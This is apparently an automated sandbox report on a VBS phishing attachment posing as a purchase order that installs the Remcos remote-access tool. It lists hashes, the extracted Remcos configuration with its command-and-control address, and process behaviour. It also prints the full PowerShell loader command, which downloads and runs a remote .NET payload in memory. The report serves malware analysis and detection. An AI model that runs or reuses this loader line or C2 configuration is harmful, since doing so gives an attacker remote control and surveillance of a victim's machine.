Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2022 19:42

General

  • Target

    Revised PO-2022091803____________________________.vbs

  • Size

    616KB

  • MD5

    531d48ee259f8728f2713676002f9bfe

  • SHA1

    47b7e7516490fbc50d2a97682d2e60989538fd07

  • SHA256

    613e915495416480491da381cc5e2041cfb0778c420b33c212a00722b15867e2

  • SHA512

    91bb0131f6e6fcedbd615eefb8cb4091174538588c7227d3a169708cb0592a6efee6fe43e8a1a54fc3e0076ef10133d439776d6ebcee215ce7a8069f0c6cc6b3

  • SSDEEP

    192:hmKZ++C+Hm+5+E+/+S+u+a+2+J+Ca+I+Y+I+L+V+v+74+B+r+Y+c+Zc+w+Ife+qC:gcgZS

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/bug/dll_nostartup

Extracted

Family

remcos

Botnet

StarMoneyNew

C2

185.252.178.35:41900

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-6RGOTF

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Revised PO-2022091803____________________________.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/bug/dll_nostartup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.lkghgjhgkjgfgytrtrts/42.021.871.591//:ptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:3152
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
            PID:4468
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
              PID:2600

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1840-132-0x0000000000000000-mapping.dmp
        • memory/1840-133-0x000002096FFE0000-0x0000020970002000-memory.dmp
          Filesize

          136KB

        • memory/1840-134-0x00007FFA07300000-0x00007FFA07DC1000-memory.dmp
          Filesize

          10.8MB

        • memory/1840-137-0x00007FFA07300000-0x00007FFA07DC1000-memory.dmp
          Filesize

          10.8MB

        • memory/2600-135-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/2600-136-0x00000000004327A4-mapping.dmp
        • memory/2600-138-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/2600-139-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/2600-141-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/2600-142-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB